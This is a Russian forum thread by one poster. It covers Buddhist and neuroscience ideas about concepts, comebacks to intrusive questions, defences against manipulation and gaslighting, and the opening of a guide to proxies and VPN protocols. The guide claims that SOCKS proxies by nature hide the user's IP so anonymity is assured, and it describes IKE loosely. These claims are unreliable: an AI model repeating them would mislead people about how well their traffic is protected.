Представьте себе маленькую девочку, которая только начала учить буквы. Она впервые в жизни видит заглавную букву А, и эта буква написана орнаментальным шрифтом. В тот момент, когда она видит А, в визуальной системе ее мозга активируется определенная группа нейронов. В другом букваре она видит другую А – на этот раз в ее основании есть арбуз. Активируется немного другой набор нейронов – в нем будет много тех же нейронов, которые активировались в первый раз (так как у буквы А в обоих случаях есть общие элементы, которые стимулируют одни и те же нейроны), но добавятся и новые, а каких-то из первого набора не будет. В третий раз девочка увидит А, написанную каким-то другим шрифтом – и вновь активируется основная группа нейронов, связанная с неизменными элементами буквы, и какие-то дополнительные нейроны.
Каждый раз, когда ребенок видит одну и ту же букву, написанную немного иначе, активируются нейроны, связанные с восприятием элементов буквы, выглядевших одинаково во всех предыдущих случаях, и по закону Хебба они оказываются все сильнее связаны друг с другом. В случае буквы А такими выглядящими одинаково элементами являются две линии, расположенные под углом друг к другу и горизонтальная черта между ними. Когда мозг начинает находить и выделять эти одинаковые элементы в каждом новом симуле, у ребенка формируется понятие буквы “А”. Позже сюда добавится звук и понимание места этой буквы в слове.
В результате каждый раз, когда девочка будет видеть две соединенные наклонные линии и горизонтальную линию между ними, в ее мозге будет немедленно включаться нейронный контур, ассоцирующийся с восприятием буквы А, и благодаря этому она будет легко узнавать эту букву и понимать, что она видит.

Концептуальная обработка реальности невероятно удобна и полезна, когда речь идет о взаимоотношениях с миром и другими людьми. Именно благодаря способности создавать новые понятия мы можем учиться и запоминать. Без нее простейшие задачи ставили бы нас в тупик, потому что мы бы вновь и вновь, словно впервые в жизни, изучали ложку или шариковую ручку, пытаясь догадаться об их предназначении.

Но у концептуального мышления есть и обратная сторона: по самой своей природе устоявшиеся понятия нарушают непосредственность нашего восприятия. И в буддизме об этом известно давным-давно. Американский ученый Джон Данн (John Dunn) приводит в пример буддийского философа Дхармакирти, жившего в VII веке. Дхармакирти рассуждал о том, что сталкиваясь несколько раз подряд с каким-то уникальным элементом объекта, мы порождаем “ложное осознавание”. Оно является результатом того, что наш ум создает “одинаковость” (а это понятие), выделяя все объекты с таким элементом в отдельный класс – потому что это наиболее уместно для наших непосредственных нужд. Из-за привычки оперировать устойчивыми понятиями, мы не осознаем, что в действительности данный элемент объекта уникален. Напротив, мы уверены, что понятие в нашей голове отражает некую фундаментальную сущность этого объекта.
Современная когнитивная наука также подтверждает тот факт, что концептуальное мышление отвлекает нас от непосредственного восприятия. В примере с буквой А группы нейронов, связанные с различиями в написании, не образуют устойчивых связей, потому что этот визуальный стимул не повторяется – это обратная сторона закона Хебба. Из-за того, что усиливаются связи только между нейронами, связанными с восприятием одинаковых эелементов, акцент в сознании девочки смещается с уникальных и неповторимых деталей на уже знакомые. Она не воспринимает уникальность! Чистота ее восприятия в некотором роде нарушена. Концептуальные фильтры в нашем мозге порождают пелену иллюзии, скрывающую от нас истинную реальность.

 

[Merfi]

По теме мозга.

Карма мозга: обречены ли мы жить в иллюзии?​

Мы не замечаем взаимозависмость и непостоянство окружающего нас мира, потому что мы кристаллизуем наш опыт в заранее сформированные составные шаблоны, которые кажутся нам неизменными во времени. Мы не видим пустотности вещей, потому что верим, что наши понятия отражают сущность вещей. Нам кажется, что определенное соединение линий действительно является буквой А и всегда будет ей.
Когда речь идет о букве это не выглядит серьезной проблемой. Но проблема появляется тогда, когда мы столь же узко воспринимаем людей и более сложные явления, навешивая на них упрощающие ярлыки. И, как следствие, мы не видим других людей (и даже самих себя) во всей уникальности текущего момента. Похоже, что иллюзия – наше некорректное восприятие реальности – является естественным следствием фундаментального биологического процесса, прекрасного в своей практичности и элегантности, но и угрожающего нам большими заблуждениями.

Что же нам делать? Неужели мы обречены разыгрывать нашу жизнь, полагаясь на милость рутинных нейронных шаблонов? И буддизм, и современная нейронаука уверены, что нет. Те же самые нейропластичные свойства нашего мозга, благодаря которым мы обретаем свои кармические ограничения, могут помочь нам освободиться из плена иллюзии.

На протяжении веков люди обращались для этого к созерцательным практикам, и их опыт свидетельствует о том, что трансформация возможна. А недавно и нейронаука – отчасти именно благодаря своему тандему с буддизмом – обнаружила ранее неизвестный факт, что наш мозг может меняться на протяжении всей жизни. Это хорошие новости: если вы регулярно практикуете медитацию, вы можете изменить ваш мозг, причем весьма значительно.
Дело в том, что механизм нейропластичности активен постоянно, мозг постоянно обновляет свои нейронные сети в ответ на текущий опыт. Если мы начинаем осознанно выбирать свой текущий опыт, мы можем активировать нужные нам отделы мозга.
Благодаря регулярной практике медитации мы можем начать осознавать свои психические привычки. А заметив их, мы можем сделать выбор – следовать им или попробовать изменить их, попробовать реагировать не автоматически, а осознанно. И тогда мы можем сформировать новые устойчивые нейронные контуры. Со временем мы можем направить нашу реку в новое русло.
Но это нелегко. Мы начинаем менять глубоко укоренившиеся психические привычки, которые сформировались благодаря тысячам, если не миллионам повторений. Вдобавок ко всему, этот процесс перепрограммирования требует много энергии – это касается и усилий, которые мы прикладываем, чтобы, например, не позволять уму блуждать, и клеточной энергии, которая необходима для создания новых устойчивых синаптических связей между нейронами.

Эти процессы на биологическом уровне отражают то, что в буддизме называют “очищением кармы”, и являются первым шагом на пути к осознанию, что кроме нашей личной кармы существует еще и карма коллективная, проявляющаяся в столь же глубоко укоренившихся социальных шаблонах поведения и мышления и охватывающая не только нашу индивидуальную жизнь.

Нам нужно набраться духу, потому что временами эта работа может быть чрезвычайно изнурительной, как психически, так и физически. По мере того, как в нашем мозге начинают возникать новые нейронные пути, старые постепенно ослабевают из-за редкого использования. И это очень вдохновляющее понимание: изменения возможны, и трудности на пути естественны. Понимание того, что для создания новых устойчивых нейронных контуров нам нужно снова и снова поступать и думать по-новому, помогает нам обрести терпение в практике медитации. Если у нас хватит преданности, мы сможем создать новые здоровые психические наклонности – к мудрости и состраданию, осознанности и доброте. Вот зачем нужна практика медитации.
Вопрос, насколько мы можем в действительности выйти за пределы этой иллюзии и изменить ситуацию, при которой абстрактные понятия “овеществляют” наш текущий опыт, по прежнему открыт в нейронауке. Как мы знаем, буддизм утверждает, что человек может начать воспринимать мир напрямую и обнаружить пустотность, которая находится за пределами всех понятий.
С биологической точки зрения мы, вероятно, никогда не сможем полностью свести на нет физические проявления тех структур нашего мозга, которые ответственны за концептуальное мышление. В конце концов, оно необходимо нам для осмысленного функционирования в мире. Но благодаря практике медитации мы можем изменить свое отношение к нашим концепциям, мы можем увидеть их основания. И тогда постепенно мы сможем приподнять завесу майи и увидеть истинную природу реальности.

 

[Merfi]

Как отвечать на "Неудобные вопросы". Психологические приемы и речевые техники.​

« И сколько же ты зарабатываешь?», «А не хотите родить второго?», «Когда же ты выйдешь замуж/женишься?», «Вы разводитесь, да?» - наверное, каждому из нас доводилось оказываться в неловкой ситуации, когда любопытному собеседнику очень хотелось заполучить информацию, которой вы не хотите делиться, а потом сожалеть о том, какое направление приняла эта беседа.

Представляю вашему вниманию несколько стратегий, которые помогут вам дать ответы на самые каверзные вопросы и при этом прекрасно себя чувствовать. Если вы последуете советам, то вам не придется лезть за словом в карман в реальной ситуации.

1) Программисты и Шерлок Холмс рекомендуют

Отвечая на неприятные вопросы, вы имеете полное право не давать собеседнику никакой конкретной информации. Ведите себя, как программист из анекдота, который на вопрос заблудившихся Холмса и Ватсона, путешествующих на воздушном шаре, ответил абсолютно правильно, но при этом от его слов не было никакой пользы.

– Сэр, не подскажете ли вы нам, где мы находимся?
– В корзине воздушного шара, сэр!

Или же давайте общую, но также не слишком полезную информацию.

– Сколько же ты зарабатываешь?
– Как все, средняя зарплата по отрасли (существенно меньше Абрамовича).

2) «Отзеркаливание»

«Возвращайте» собеседнику его вопрос. Сделать это можно с помощью двух простых методик.

1) Формулируйте «переспрос» так, чтобы человеку, с которым вы беседуете, стало неудобно за свой интерес. Используйте универсальную конструкцию, которая начинается со слов «Я правильно понимаю, что...», а ее окончание будет зависеть исключительно от того, будете ли вы продолжать общение, хотите ли «выстроить» свои личные границы и т. д.: «Я правильно понимаю, что ты не прочь подержать свечку в моей спальне?», или «Я правильно понимаю, что твоя главная проблема на сегодняшний день — это моя личная жизнь?», или «Я правильно понимаю, что интерес к чужим бедам для вас в порядке вещей?». Отлично, если вы скажете все это очень вежливым, очень спокойным, ледяным тоном и не станете при этом жестикулировать, разве что удивленно приподнимете одну бровь.

2) «Усиливайте» интерес к заданной теме, адресуя собеседнику встречный вопрос из той же категории:

– Вы когда собираетесь рожать второго-то?
– А вы — третьего?

3) «Театр одного актера»

Услышав какой-то неприятный вопрос, вы всегда можете представить себя великой драматической актрисой, проникновенно заглянуть собеседнику в глаза, глубоко вздохнуть, прижать руки к груди (при желании можно «ломать» пальцы), изобразить бездну отчаяния и сказать трагическим голосом: «Умоляю тебя! Никогда, ты слышишь, никогда меня об этом не спрашивай!». Второй вариант — вы изображаете человека, дающего пресс-конференцию (мы не будем называть конкретных имен, но рекомендуем обратить внимание на лиц первого эшелона власти) и произносите фразу: «Пожалуйста, следующий вопрос!». Третья версия — для поклонниц сериала «Универ». Вспоминайте каратиста Эдуарда Кузьмина (он же Кузя) и говорите: «Это секретная информация!».

4) «Я — не зануда, не зануда, не зануда!»

Вместо того, чтобы обижаться, злиться или еще как-то демонстрировать, что вопрос собеседника вас задел, начните ровным монотонным голосом отвечать. Самое главное — это детали. Излагайте мельчайшие подробности и начинайте очень издалека!

– Когда же ты выйдешь замуж?
– Астрологи говорят, что для заключения счастливого брака необходимо, чтобы асценденты у влюбленных сходились (не спрашивайте нас, что такое асценденты и должны ли они сходиться на самом деле — годится любая заумная теория, в которой ваш визави не слишком разбирается, хоть «звездограмма», хоть крутой поворот линии жизни, хоть индекс Наздака). И вот в тот момент, когда я пойму, что встретила свою вторую половинку и проверю, подходим ли мы друг другу (придется уточнить где и во сколько он родился), тогда скажу ему: «Да». И ни минутой раньше.

5) Шутите, это раздражает!

– Боже мой, сколько же ты потратила на это платье?
– Пришлось голодать две недели, но чего не сделаешь ради моды!

Универсальные ответы

«Я восхищаюсь вашим умением задавать вопросы, которые ставят в тупик!» Или: «Вы — восхитительная женщина (удивительный мужчина), знаете, что меня в вас всегда поражало? Это ваше умение задавать некорректные (сложные, риторические) вопросы!»

«С удовольствием отвечу на ваш вопрос, только скажите сначала, почему вас это так сильно интересует?»

«А вы в каких целях интересуетесь?»

«Вы действительно хотите об этом поговорить?». Если слышите утвердительное «Да», смело парируйте: «А я — не хочу», - и улыбайтесь.

Если вы не хотите больше иметь никаких дел с человеком, который задает бестактные вопросы, можно позволить несколько больше. Например, заметить в ответ: «Это мое собачье дело».

 

[Merfi]

Манипуляторы: учитесь играть с ними в их же игру.​

Случалось ли вам в жизни попадать в такие ситуации, когда коллеги свешивали на вас свою работу, а вам было неудобно отказать? Бывает, что делаете что-то против своей воли? Или, может, вы постоянно идёте на поводу у других не в силах отказать и сказать «нет»? Если какая-то из этих ситуаций оказалась знакомой, значит вы стали жертвой психологической манипуляции. Давайте учиться им противостоять!


Манипуляция – это скрытое психологическое влияние, управление другим человеком, целью которого является получение односторонней выгоды и стремление заставить человека совершить определённые действия против его воли.

Теперь давайте более подробно остановимся на основных тезисах.

Итак, первое: манипуляция – это управление или воздействие. То есть человек, стремящийся получить для себя какую-то выгоду (манипулятор) использует определённые приёмы или уловки для того, чтобы управлять другими. Арсенал методов манипулятора очень широк и о нём я расскажу чуть позже.

Второе: манипуляция носит скрытый характер. То есть жертва чаще всего не осознаёт, что происходит. По крайней мере, на первом этапе, когда манипулятор обращается к ней с какой-то просьбой. Манипуляция в принципе возможна только в скрытом виде. Как только манипуляция раскрывается, то тут же теряет свою силу и не может быть дальше реализована.

И, наконец, третий тезис: манипуляция носит одностороннюю выгоду. Т.е. манипулятор оказывается в выигрыше, а жертва проигрывает.

С манипуляциями мы можем встретиться на каждом шагу. Они присутствуют практически во всех сферах нашей жизни. Это может происходить на работе, в романтических отношениях, между детьми и родителями, в деловом общении и так далее.

Что же движет манипуляторами? Почему они затевают эти «подковёрные игры»?

Основных причин тому две:

1) Человек не может попросить о чём-то напрямую: открыто и искренне. Просьба для него является синонимом унижения. Поэтому манипулятор идёт «в обход» и с помощью определённых уловок просто вынуждает другого выполнить те или иные действия.

2) Стремление прилагать как можно меньше усилий и получать всё за счёт других. Если родители всё делали за ребёнка, не приучив его к самостоятельности, то, вырастая, такой человек будет ожидать от других, чтобы всё сделали за него.

Как же понять, что вами манипулируют?

Здесь есть два аспекта: внутренний и внешний.

Внутренний: манипуляцию в первую очередь можно распознать по собственным негативным ощущениям, по собственному восприятию.

Например:
• Человек испытывает ощущение психологического давления;

• Возникает нежелание выполнять действия, которые на первый взгляд кажутся вполне естественными;

• Ощущение себя «не в своей тарелке».

Внешний аспект, или по поведению манипулятора.

Основными методами, которые использует манипулятор, являются:
• Психологическое давление;

• Давление на чувства: вины, жалости;

• Уговоры;

• Угрозы;

• Шантаж.

Сталкиваясь с манипулятором в жизни мы, чаще всего, не знаем, как вести себя с ним и обычно поведение «жертвы» сводится к двум вариантам: пассивное или агрессивное.

При пассивном поведении жертва идёт на поводу у манипулятора, «плывёт по течению», не оказывает никакого сопротивления.

При агрессивном поведении жертва вступает в противостояние с манипулятором, что в конечном итоге приводит к конфликту и чревато потерей времени и сил.

Однако существует третий тип поведения, который позволяет конструктивно разрешать подобные ситуации. Это уверенное поведение, которое позволит вам легко и без «жертв» выходить из сложных ситуаций.

Стать уверенным и научиться легко противостоять манипуляторам не получится за один раз. Здесь нужна постоянная тренировка в течение хотя бы 2 – 3х месяцев. Зато после этого вами уже никто даже не будет пытаться манипулировать.

Практические приёмы, позволяющие противостоять манипуляторам

1. Метод заигранной пластинки

Метод подходит в ситуации, когда кто-то пытается вам навязать какой-то товар или услугу.

В процессе того, как манипулятор к вам обращается спокойно слушайте вашего собеседника, эмоционально никак не реагируйте на его слова. Когда он закончит говорить, или обратится к вам с вопросом/просьбой, тактично, но уверенно скажите, что не нуждаетесь в предлагаемом товаре. Делайте это без раздражения, находясь в абсолютно спокойном состоянии. При этом не оправдывайтесь и не объясняйте, почему вам не нужен этот товар. На протяжении всего разговора просто повторяйте одну и ту же фразу: «Спасибо, мне это не нужно». Повторяйте ровно и спокойно, оставайтесь на одной волне. Больше ничего говорить не нужно, только эту фразу. Цель метода не в том, чтобы научиться говорить одно и то же, как заигранная пластинка, а чтобы научиться настойчивости.

2. Ноль эмоций

Ваша задача сохранять молчание на протяжении всего разговора. Вами не должно быть произнесено ни одного слова. Что бы ни говорил манипулятор, какие вопросы бы вам не задавал и как бы ни провоцировал, сохраняйте молчание. Также вы никак не должны показывать свои эмоции: просто наблюдайте за происходящим с отсутствующим видом. С вашей стороны не должно быть никаких невербальных проявлений эмоций (жесты, мимика и т.д.).
Можно иногда смотреть на собеседника. Самое главное – сохраняйте молчание и не выдавайте свои эмоции несмотря ни на что.

3. «Болтовня»

Когда манипулятор обратится к вам с какой-то просьбой, начните активно перебивать его и рассказывайте что-то своё, причём к теме никак не относящееся. Говорите про погоду, про кошек, про отдых. Про что угодно. В общем, активно ведите диалог с собеседником, но не по теме. Перебивайте, задавайте глупые вопросы, не относящиеся к делу. В общем, ведите себя так, как от вас не ожидают в данной ситуации. Можно рассказать стихотворение или спеть песню.


Эти 3 метода основаны на принципе нестандартного поведения. Когда манипулятор обращается к нам с какой-то просьбой, он ожидает определённого поведения. Другими словами, он заранее просчитывает наше поведение и «расставляет ловушки» в нужных местах. Однако когда мы демонстрируем вовсе не то поведение, которое от нас ожидает манипулятор, мы выбиваем его из его же сценария и таким образом обезоруживаем.

Хочу привести ещё один очень эффективный метод психологической защиты. Называется он «Стенка».

Когда ваш собеседник начнёт говорить, представьте, что между вами стеклянная перегородка. Вы видите собеседника и слышите то, что он говорит. Но никакие эмоции, исходящие от вашего собеседника через стенку не проходят. Они словно ударяются об эту стену и возвращаются обратно. Вы воспринимаете, что говорит человек (содержание), но при этом как он это говорит (форма) не оказывают на вас никакого влияния. Вы словно наблюдаете за рыбками в аквариуме.

На протяжении всего разговора сохраняйте образ этой стенки перед глазами. Сами в разговоре инициативу не проявляйте. Можете лишь отвечать на вопросы в том случае, если вам будут их задавать. Если нет, то просто молча слушайте, всё время мысленно представляя стену.

Суть этого метода заключается в том, чтобы не дать манипулятору эмоционально вовлечь вас в свою «игру». До тех пор, пока вы будете оставаться спокойным и невозмутимым манипулятор не сможет воздействовать на ваши эмоции, следовательно, управлять вами.

Тренируйтесь, и через некоторое время вы увидите, что негативные ситуации просто уйдут из вашей жизни!)

 

[Merfi]

Еще по теме манипуляции
Надеюсь будет интересно почитать.

Первое, чему учится младенец, — видеть, двигаться и манипулировать родителями. Умение управлять людьми мы впитываем с молоком матери. Если громко кричать — тебя покормят, если умильно агукнуть — поцелуют. С возрастом стратегии эволюционируют.
Манипуляция — это естественно. Это метод выживания среди себе подобных.

Но есть люди, которые достигли в манипуляции совершенства. Они манипулируют, как дышат. У них этот способ общения перестает быть средством, а становится единственным каналом связи. От такого нездорового поведения страдают все.

Эта рассылка будет полезна тем, кто хотел бы разорвать порочный круг «манипулятор — жертва» и сделать свои отношения с окружающими более здоровыми, гармоничными и эффективными.

Офисная магия
анипуляция — иллюзия. Вы — недотепа, вызванный из зала под яркие лучи софитов. Если фокусник сказал, что голубь у вас в рукаве, так оно и будет. Иллюзионист — ваш противник. Он всегда прав и весь в белом. Что бы вы ни сделали, он это запланировал.

Менеджер Алина второй месяц просит менеджера Машу подменять ее в магазине по выходным. Каждый раз, когда Маша хочет отказать, Алина рассказывает про тяжелый период в жизни, недавнее расставание с парнем и больную кошку.

Если Маша резко откажет, на следующий день все сотрудники осудят ее за «жестокость».

Если снова выйдет на замену — ее будут считать тряпкой.

Манипуляция, как и любой фокус, работает, только если отвлечь внимание зрителя. Поэтому сложно осознать, что вами манипулируют.

Нет ничего опасного в том, чтобы помочь коллеге. Но нужно вовремя остановиться, пока вам не сели на шею.

В известнейшей книге «Игры, в которые играют люди» американский психиатр Эрик Берн описал три типа манипуляторов: Жертва, Спаситель и Агрессор.

Его ученик Стивен Карпман объединил эти типажи в треугольник отношений. Исследования показали, что любой человек, поддавшийся манипуляции, становится одной из фигур в этом замкнутом цикле.


Жертва страдает, Спаситель пытается ей помочь. Жертве требуется все больше и больше помощи, и она становится Агрессором. А Спаситель превращается в Жертву. Если пустить все на самотек, каждый участник треугольника превращается в манипулятора.

Возникает стокгольмский синдром — состояние, когда заложники начинают симпатизировать террористам. И тот, кто страдает от манипуляции, уже не может без нее существовать.

Ловкость рук
Ловить манипулятора на «горячем» бесполезно. Манипуляция основана на сиюминутной иллюзии и не оставляет улик и свидетелей. Вы не докажите, что фокусник блефовал, даже если поймаете его за руку. Развеять волшебство можно, только определив, как работает фокус.

Любая манипуляция паразитирует на трех принципах:

— псевдологическая связь,

— низкая самооценка,

— отсутствие доказательств.

Неправильные логические цепочки пользовались популярностью еще у ораторов Древней Греции. Софисты — платные учителя красноречия — прославились благодаря запутанным доказательствам, где отдельные тезисы не всегда были связаны с выводами.

Вор берет только хорошее. Стремиться к хорошему — хорошо. Значит, воровство — хорошее дело.

Мы привыкли, что за доказательствами следует вывод, отдельные примеры создают общее правило. Поэтому в сложных рассуждениях легко упускаем нарушение связи.

Манипулятор этим пользуется. Внимание рассеивается, и мы уже не заметили, из какого рукава появилась карта.

Паша работает в рекламном отделе, Миша в отделе по работе с клиентами. Паше поручили сделать презентацию по продажам нового товара. Он звонит Мише и говорит, что Миша должен прислать ему график продаж и диаграмму покупателей по возрасту, полу и месту проживания — без этой информации нельзя разработать предложения по рекламе.

Поскольку презентация нужна начальству завтра, Мише придется отложить свои дела и заняться исследованиями. Миша поможет Паше, он не заметил, что причина не связана со следствием.

То, что без информации нет презентации, не значит, что диаграмму должен рисовать Миша. Это может сделать и Паша по предоставленным данным.

Недостающие логические связи мы с успехом достраиваем сами. И чувствуем себя виноватыми, если не успеваем сделать работу за других. Нам всегда найдется, в чем себя упрекнуть. И манипулятор этим пользуется.

Проекция — перекладывание своих недостатков на других. Манипулятор во всем обвиняет нас. А мы готовы соглашаться, потому что сами не даем себе спуску.

Чем внимательнее вы смотрите внутрь себя, тем меньше смотрите по сторонам и не замечаете контроля извне.

Патологические лжецы часто обвиняют своих жертв во вранье.

Громче всех по поводу опозданий возмущаются непунктуальные люди.

У плохих работников «неэффективное начальство».

В проблемах на работе обвиняют «ужасных» коллег, а не собственную некомпетентность.

Сложно выбить почву из-под ног уверенного в себе человека. Значит, нужно заставить его сомневаться.

 

[Merfi]

Еще по теме манипуляции
Надеюсь будет интересно почитать.

Перед атакой манипуляторы часто проводят «бомбардировку любовью». Хвалят и идеализируют вас, пока вы не примите это как должное, а потом начинают отмечать только ваши ошибки. Не понимая, что изменилось, вы начинаете копаться в себе и сами роете яму.


Газлайтинг — это форма психологического насилия, которая заставляет оппонента сомневаться в реальности происходящего.

Термин появился в 1944 году после выхода на экраны американского фильма «Газовый свет». По сюжету героиню доводили до сумасшествия едва заметным мерцанием газовых фонарей.

«Тебе показалось», — говорит собеседник. Люди действительно склонны ошибаться, воспринимать реальность субъективно. Вам действительно могло лишь показаться, что коллега играет против вас. Проверить, ошибаетесь вы или нет, невозможно.

Манипуляция чаще всего происходит на словах. Правду знает только ваш оппонент, а тот утверждает, что безгрешен.

Такие люди постоянно проверяют чужие границы: исследуют, как далеко им позволят зайти. Чем больше им сходит с рук, тем сильнее они нападают.

Если жертва сумеет вырваться, манипулятор применит «технику пылесоса» — сменит обращение и начнет набиваться в друзья, делать маленькие подарки и любыми способами затягивать жертву обратно в паутину влияния.

Изнанка трюка
Задача манипулятора — заставить вас принять выгодное ему решение. Как Воланд учил Маргариту ни о чем никогда не просить, так и манипулятор хочет получить желаемое, но не отдавать конкретного приказа.

Немецкий психолог Фредерик Перлз считал, что манипуляторы действуют бессознательно: не доверяя людям, они стараются их контролировать.

Социолог Эрих Фромм называл это потребностью доказанной любви — когда преданность нужно постоянно подтверждать.

Это не значит, что манипулятор занимает лидирующую позицию. Поднять белый флаг — значит заставить противника, готового к войне, принять перемирие.

Вы заметили, что вас склоняют к какому-то решению, — вежливо переспросите о нем напрямую.

Если оппонент убеждает, что вам показалось, значит, появляется официальный повод этой позиции не придерживаться.

Спастись от манипуляции можно ответной манипуляцией.

Манипулятору что-то нужно — притворитесь, что не понимаете, и ему придется перейти к активным действиям, которые его выдадут.

Соглашайтесь, не конкретизируя, повторяйте вежливый отказ, «отзеркаливайте» действие противника. Главное, не переусердствовать и самому не стать «чудовищем».

Быть манипулятором плохо. Но не потому, что этот стиль поведения осуждается обществом. Манипулятор теряет связь с действительностью и не знает другой тактики достижения желаемого.

Манипуляция невозможна без подтасовок, лжи, театра одного актера. И вырваться из этого болота очень сложно.

По мнению американского психолога Абрахама Маслоу, полная противоположность манипулятору — актуализатор.

Это свободная, открытая и здоровая личность. Она добивается своего «чистыми» методами и не ставит людей в зависимость.

Манипуляторы обоснованно не верят людям. Люди интуитивно не готовы оказывать манипулятору поддержку добровольно.

Грехи, на которых манипуляторы паразитируют — низкая самооценка, неуверенность, — в равной мере относятся к ним самим.

Манипулятор живет в состоянии постоянной войны с миром. Быть манипулятором плохо, потому что это невыгодно. Затраты на управление людьми гораздо больше самой отдачи.

Цилиндр, кролик и волшебная палочка

Искусство манипуляции, как и искусство иллюзионистов, оттачивается годами.

Манипуляция бывает разных масштабов — можно менять общественное мнение на уровне страны, можно управлять ухажерами в рамках песочницы. Приемов много.

Оружие против них одно: какие бы трюки и фокусы вам ни показывали, будьте уверены в собственной позиции.

Метод социального доказательства. Вас хотят убедить, что правильный ответ — ответ большинства. Абстрагируйтесь, взвесьте все за и против, примите ответственность за решение.

Переход на личности. Оппонент призывает не верить вашему профессиональному опыту из-за вашего вида / личного статуса / особенностей характера. Не реагируйте на тычки и вежливо возвращайте беседу в область профессионального обсуждения.

Правило взаимного обмена. Вам оказывают мелкую услугу, о которой вы не просили, чтобы сделать из вас должника. Принимайте подарок, но помните, что вы сами помогаете человеку почувствовать себя спасателем. Значит, вы квиты.

Метод Бенджамина Франклина. Вас просят о незначительной помощи и несоразмерно благодарят, чтобы вы чувствовали себя благодетелем и относились к просителю снисходительно. Оказывайте помощь безвозмездно. Покровительство — разновидность разрушительной гордыни.

Эмоциональный взрыв. Вас выводят из эмоционального равновесия, а потом заставляют принимать решения. Тяните время и давайте ответ только тогда, когда будете способны адекватно измерить риски и рассчитать потери.

 

[Merfi]

Краткий справочник анонима. Виды шифрования и защиты трафика, выбор софта​

Неважно, по каким причинам ты решил шифровать то, что пересылаешь через интернет. Это может быть забота о секретности личных данных, попытка обойти запреты того или иного государства или другие мотивы. В современном мире простым людям доступен неплохой выбор криптостойких шифрованных протоколов и программ, которые их реализуют. В этой статье мы пройдемся по всем классам таких решений (пусть многие из них и широко известны), обсудим надежность и посмотрим, какие доступны реализации.

Прокси-серверы
Прокси-серверы — самый доступный способ анонимизировать трафик: они дешевы и широко распространены. Их принцип работы очень прост: прокси — это почтальон, который доставляет конверты с письмами вместо тебя, аккуратно стирая имя отправителя, и возвращает ответ лично тебе в руки.
Изначально эта технология была призвана защищать внутренние корпоративные сети от остального интернета (сотрудники получали доступ из внутренней сети в интернет через шлюз), но стала исторически первым способом анонимизировать трафик.

Работая через прокси, компьютер все свои запросы перенаправляет через посредника (прокси-сервер), и уже посредник, представляясь твоим компьютером, запрашивает данные у сайтов. Прокси-серверы узкоспециализированы, поэтому на каждый тип интернет-соединения имеется свой тип прокси. Например, для FTP (File Transfer Protocol) есть FTP-прокси. Подробно мы разберем три типа прокси-серверов.
HTTP и HTTPS могут работать только с запросами HTTP, а вся разница между ними в том, что HTTPS шифрует передаваемые данные, а HTTP — нет. Поэтому прокси HTTP не рекомендуются к пользованию, они могут лишь менять адрес IP, а данные защитить они неспособны. Также будь осторожен с выбором самого прокси-сервера, так как некоторые не только не защитят твои данные, но и могут раскрыть личность.

INFO
Обращай внимание на тип сервера — transparent proxy или anonymous proxy. Первые не будут скрывать твою личность!
Использовать такой прокси несложно: найди в интернете или создай сервер, которому сможешь доверять, и, открыв настройки браузера (доступ к сети), введи данные.
Тип SOCKS применяется в тех приложениях, которые либо не используют HTTP и HTTPS, либо не имеют встроенной поддержки прокси-серверов. В отличие от предыдущего типа, этот априори не будет публиковать твой IP, поэтому об анонимности можно не беспокоиться. Однако SOCKS сам по себе не предоставляет никакого шифрования, это лишь транспортный протокол. Чтобы применять его, есть, например, утилита Shadowsocks.
SOCKS4 и SOCKS5 — это разные версии серверов. Убедительно рекомендую использовать пятую версию, так как она имеет много возможностей и более безопасна. Например, поддерживает использование логина и пароля, запросы DNS. А лучше даже использовать Shadowsocks — это SOCKS5 на стероидах. Тут есть и мощное шифрование, и скрытие трафика, и возможность обходить различные блокировки. Есть клиенты как для компьютера, так и для смартфона, позволяющие оставаться под защитой постоянно.
Чтобы начать использовать SOCKS в привычных программах, не нужно ничего особенного. В Firefox и µTorrent эта функция встроена и доступна в настройках. Для Google Chrome есть расширение Proxy Helper. Можно воспользоваться универсальными программами вроде SocksCap или ProxyCap.
Список множества бесплатных HTTP, HTTPS и SOCKS прокси-серверов можно найти либо с помощью поиска, либо в Википедии.

VPN
VPN (Virtual Private Network — виртуальная частная сеть) также изначально не задумывалась как средство защиты и анонимизации трафика. Ее задачей было объединить компьютеры в единую сеть, даже если они находятся за множество километров друг от друга. Ключевой особенностью стало то, что соединения VPN всегда защищались шифрованием, так как использовались в корпорациях и позволяли подключать несколько филиалов к головному офису.
VPN имеет два режима: объединение двух локальных сетей между собой через интернет и подключение отдельного компьютера к удаленной локальной сети (удаленный доступ). Последний и послужил основой для некоммерческого, персонального варианта. Защита данных в соединении VPN предоставляется двумя техниками, которые зачастую используются вместе:

• PPP (Point-to-Point Protocol) используется для защиты на уровне канала данных, то есть на самом низком из возможных. Его задача — обеспечить стабильное соединение между двумя точками в интернете, а также предоставить шифрование и аутентификацию.
• PPTP (Point-to-Point Tunneling Protocol) является расширением и дополнением PPP. Для работы этого протокола устанавливается два соединения — основное и управляющее.

Из-за того что придуман этот протокол был в далеком 1999 году, его безопасность оставляет желать лучшего. Ни один из методов шифрования, работающих с PPTP, не устойчив. Часть из них подвержена расшифровке даже в автоматическом режиме. Потому я не советую использовать PPTP. Этот протокол имеет серьезные уязвимости как в аутентификации, так и в шифровании и позволяет злоумышленнику очень быстро вскрыть канал и получить доступ к данным.
Более новый способ создания соединения — еще один протокол, построенный поверх PPP, — L2TP (Layer 2 Tunneling Protocol). Цель этого протокола — не столько защитить соединение, сколько полностью регламентировать процесс сообщения компьютеров в сети. Данный протокол, кроме создания соединений VPN, также используется, например, для подключения банкоматов к офисам банков, что служит некоторой гарантией. Хотя и стоит учесть, что собственного шифрования у L2TP нет.
L2TP не защищает сами данные, передаваемые в его рамках. Для этого обычно используется протокол IPsec (IP security). Он призван защищать содержимое пакетов IP и благодаря этому может шифровать любые виды соединений. Для VPN из двух возможных режимов используется лишь туннельный, защищающий не только данные передаваемого пакета в сети, но и его заголовки. Благодаря этому со стороны не будет видно, кто отправитель данных.
IKE и IKEv2 (Internet Key Exchange) — строгие алгоритмы шифрования и защиты данных, передаваемых по информационному каналу. Используется исключительно с IPsec, так как является его защитным слоем — именно благодаря IKE данные в соединении остаются под замком. В общем-то, эти алгоритмы и послужили основой для развития всех современных средств и утилит создания соединений VPN, но настало время поговорить о том, что и из чего выбирать.
С распространением SSL и TLS протокол PPP был расширен до SSTP (Secure Socket Tunneling Protocol) и в таком виде работает не через открытое соединение, а по SSL. Это гарантирует надежное шифрование и защиту от потери пакетов. Но стоит учитывать, что SSTP был разработан в Microsoft, а Microsoft сотрудничает с правительствами, поэтому доверять SSTP можно только с учетом этого.
